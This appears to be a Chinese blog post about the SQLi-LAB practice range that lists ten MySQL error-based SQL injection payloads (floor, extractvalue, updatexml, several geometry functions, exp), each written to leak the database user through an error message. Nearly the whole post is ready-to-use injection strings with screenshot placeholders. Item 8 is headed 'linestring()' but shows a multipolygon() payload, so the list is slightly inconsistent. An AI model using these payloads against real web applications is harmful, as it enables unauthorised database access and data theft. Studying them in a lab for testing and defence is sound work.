靶场使用SQLi-LAB Lesson1:
image.png
网上看了一些文章,大多数报错函数都是floor() extractvalue() updatexml() exp(),但是在mysql中还有很多其他的报错函数
1、floor()
payload:id=-1'+and+(select 1 from (select count(),concat(user(),floor(rand()2))x from information_schema.tables group by x limit 0,1)a)%23
image.png
2、extractvalue()
使用sqli-lab第二关
payload:id=1+and+(extractvalue(1,concat(0x5c,(select user()))))%23
image.png
3、updatexml
payload:id=1+and+(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))%23
image.png
4、GeometryCollection()
payload:id=1+and+GeometryCollection((select * from(select *from(select user())a)b))%23
image.png
5、polygon()
payload:id=1+and+polygon((select * from(select * from(select user())a)b))%23
image.png
6、multipoint()
payload:id=1+and+multipoint((select * from(select * from (select user())a)b))%23
image.png
7、multilinestring()
payload:id=1+and+multilinestring((select * from(select * from (select user())a)b))%23
image.png
8、linestring()
payload:id=1+and+multipolygon((select * from (select * from (select user())a)b))%23
image.png
9、linestring()
payload:id=1+and+linestring((select * from (select * from (select user())a)b))%23
image.png
10、exp()
payload:id=1+and+exp(~(select * from (select user())a))%23
image.png
网友评论